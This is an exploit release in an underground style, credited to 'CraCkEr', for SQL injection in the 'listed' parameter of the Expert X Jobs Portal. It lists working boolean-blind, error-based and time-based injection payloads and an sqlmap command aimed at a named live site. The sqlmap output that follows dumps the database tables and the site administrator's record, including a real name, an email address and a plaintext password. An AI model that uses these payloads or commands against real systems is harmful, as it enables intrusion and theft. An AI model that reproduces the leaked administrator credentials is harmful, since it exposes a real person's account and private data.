┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : wvidesk.com │ │ │
│ Vendor : WVIDesk │ │ │
│ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, │
│ Resume Builder v. 1.0 │ │ events and scholarships. │
│ Vuln Type: Remote SQL Injection │ │ │
│ Method : GET │ │ │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter 'listed' is vulnerable.
---
Parameter: listed (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD
Type: time-based blind
Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)
Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#
---
[+] Starting the Attack
sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:03:36] [INFO] fetching current database
[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'
current database: 'livexzfv_jobdreamers'
fetching tables for database: 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
[56 tables]
+---------------------+
| adminMenu |
| applyajob |
| candidatefeedback |
| candidatelogin |
| candidateview |
| clickcount |
| controlall |
| controlcategory |
| coursecategory |
| courseinstitute |
| coursevisitsite |
| eventcategory |
| eventtype |
| jobagentcountry |
| jobalert |
| jobcategory |
| jobcity |
| jobcompanyinfo |
| jobcontinent |
| jobcountry |
| jobeducationsubject |
| jobindustry |
| jobmessage |
| jobpostingprice |
| jobquestion |
| jobseniority |
| jobuniversity |
| jobusermaster |
| jobusertype |
| jobvisitsite |
| mainmenu |
| postacourse |
| postaevent |
| postajob |
| postascholarship |
| resumeaward |
| resumecarsum |
| resumecertificate |
| resumecomment |
| resumeeducation |
| resumelanguage |
| resumeprofessional |
| resumepublication |
| resumeresearch |
| resumeskill |
| resumesumexp |
| resumetraining |
| resumework |
| scholarshipperiod |
| seeker_profile |
| seekers_admin |
| siteAdmin |
| siteadminuser |
| tbl_countries |
| tblpage |
| userrole |
+---------------------+
fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
Table: siteadminuser
[8 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| aflag | varchar(2) |
| desig | varchar(200) |
| enet | varchar(450) |
| fullname | varchar(450) |
| id | int(10) |
| pw | varchar(25) |
| role | int(10) |
| users | varchar(200) |
+----------+--------------+
fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'
Database: livexzfv_jobdreamers
Table: siteadminuser
[1 entry]
+-------+------------+--------------------+------------------------+----+------+------+-------+
| aflag | desig | enet | fullname | id | pw | role | users |
+-------+------------+--------------------+------------------------+----+------+------+-------+
| Y | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir |
+-------+------------+--------------------+------------------------+----+------+------+-------+
[-] Done